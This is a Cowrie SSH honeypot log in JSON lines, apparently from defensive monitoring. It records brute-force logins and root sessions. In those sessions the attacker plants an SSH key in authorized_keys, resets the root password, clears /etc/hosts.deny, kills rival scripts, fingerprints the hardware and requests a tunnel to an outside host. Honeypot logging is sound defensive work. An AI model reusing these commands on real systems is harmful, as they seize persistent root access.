{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:34.356990Z","src_ip":"212.227.235.229","session":"7ea70fe21bf3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44910,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8ba124fc072","protocol":"ssh","message":"New connection: 212.227.235.229:44910 (1.2.3.4:22) [session: b8ba124fc072]","sensor":"my-vps","timestamp":"2025-09-08T22:12:38.670852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:39.145659Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:39.393397Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.login.success","username":"root","password":"Arditi123","message":"login attempt [root/Arditi123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:12:41.002163Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:41.526239Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:12:41.527200Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:12:41.528251Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:42.786274Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:43.104203Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:12:43.104954Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:12:43.357124Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:43.357959Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38566,"dst_ip":"1.2.3.4","dst_port":22,"session":"86628a196400","protocol":"ssh","message":"New connection: 212.227.235.229:38566 (1.2.3.4:22) [session: 86628a196400]","sensor":"my-vps","timestamp":"2025-09-08T22:12:43.607023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:43.609039Z","src_ip":"212.227.235.229","session":"86628a196400"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:43.857220Z","src_ip":"212.227.235.229","session":"86628a196400"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:12:44.859320Z","src_ip":"212.227.235.229","session":"86628a196400"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:46.113315Z","src_ip":"212.227.235.229","session":"86628a196400"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38576,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4e4fac49665","protocol":"ssh","message":"New connection: 212.227.235.229:38576 (1.2.3.4:22) [session: e4e4fac49665]","sensor":"my-vps","timestamp":"2025-09-08T22:12:46.360950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:46.362316Z","src_ip":"212.227.235.229","session":"e4e4fac49665"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33314,"dst_ip":"1.2.3.4","dst_port":22,"session":"59b8487b78b0","protocol":"ssh","message":"New connection: 212.227.235.229:33314 (1.2.3.4:22) [session: 59b8487b78b0]","sensor":"my-vps","timestamp":"2025-09-08T22:12:52.233434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:52.235368Z","src_ip":"212.227.235.229","session":"59b8487b78b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:52.366598Z","src_ip":"212.227.235.229","session":"e4e4fac49665"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:52.368436Z","src_ip":"212.227.235.229","session":"e4e4fac49665"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:52.392397Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:12:52.393185Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:52.486808Z","src_ip":"212.227.235.229","session":"59b8487b78b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:52.646191Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:53.242602Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"echo \"root:nzns88cHVxpK\"|chpasswd|bash","message":"CMD: echo \"root:nzns88cHVxpK\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T22:12:53.243504Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.login.failed","username":"media","password":"123456","message":"login attempt [media/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:12:53.532908Z","src_ip":"212.227.235.229","session":"59b8487b78b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50240,"dst_ip":"1.2.3.4","dst_port":22,"session":"4657f78d94e2","protocol":"ssh","message":"New connection: 212.227.235.229:50240 (1.2.3.4:22) [session: 4657f78d94e2]","sensor":"my-vps","timestamp":"2025-09-08T22:12:53.540684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:53.541385Z","src_ip":"212.227.235.229","session":"4657f78d94e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:53.850566Z","src_ip":"212.227.235.229","session":"4657f78d94e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/80afc8d78e58cb9d5b5b58cbfe569fa3dc9dba5fc90f7e2e8c7a72d6a25bb518","size":21,"shasum":"80afc8d78e58cb9d5b5b58cbfe569fa3dc9dba5fc90f7e2e8c7a72d6a25bb518","duplicate":false,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/80afc8d78e58cb9d5b5b58cbfe569fa3dc9dba5fc90f7e2e8c7a72d6a25bb518 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:54.217670Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:54.529589Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T22:12:54.530271Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T22:12:54.783534Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:54.784514Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:54.785569Z","src_ip":"212.227.235.229","session":"59b8487b78b0"}
{"eventid":"cowrie.login.failed","username":"aisino","password":"12345","message":"login attempt [aisino/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:12:55.151761Z","src_ip":"212.227.235.229","session":"4657f78d94e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:55.301571Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T22:12:55.302415Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:55.558236Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43017,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd75ba96f3d","protocol":"ssh","message":"New connection: 212.227.235.229:43017 (1.2.3.4:22) [session: 9cd75ba96f3d]","sensor":"my-vps","timestamp":"2025-09-08T22:12:56.012764Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:56.014027Z","src_ip":"212.227.235.229","session":"9cd75ba96f3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43381,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c7e263a3190","protocol":"ssh","message":"New connection: 212.227.235.229:43381 (1.2.3.4:22) [session: 7c7e263a3190]","sensor":"my-vps","timestamp":"2025-09-08T22:12:56.114181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:12:56.116282Z","src_ip":"212.227.235.229","session":"7c7e263a3190"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T22:12:56.246160Z","src_ip":"212.227.235.229","session":"7c7e263a3190"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:56.463076Z","src_ip":"212.227.235.229","session":"4657f78d94e2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:12:56.771419Z","src_ip":"212.227.235.229","session":"7c7e263a3190"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T22:12:56.903815Z","session":"7c7e263a3190"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:57.092049Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T22:12:57.092764Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:57.346222Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:58.842108Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T22:12:58.842824Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T22:12:58.843449Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:59.095443Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:12:59.619827Z","src_ip":"212.227.235.229","session":"b8ba124fc072"}
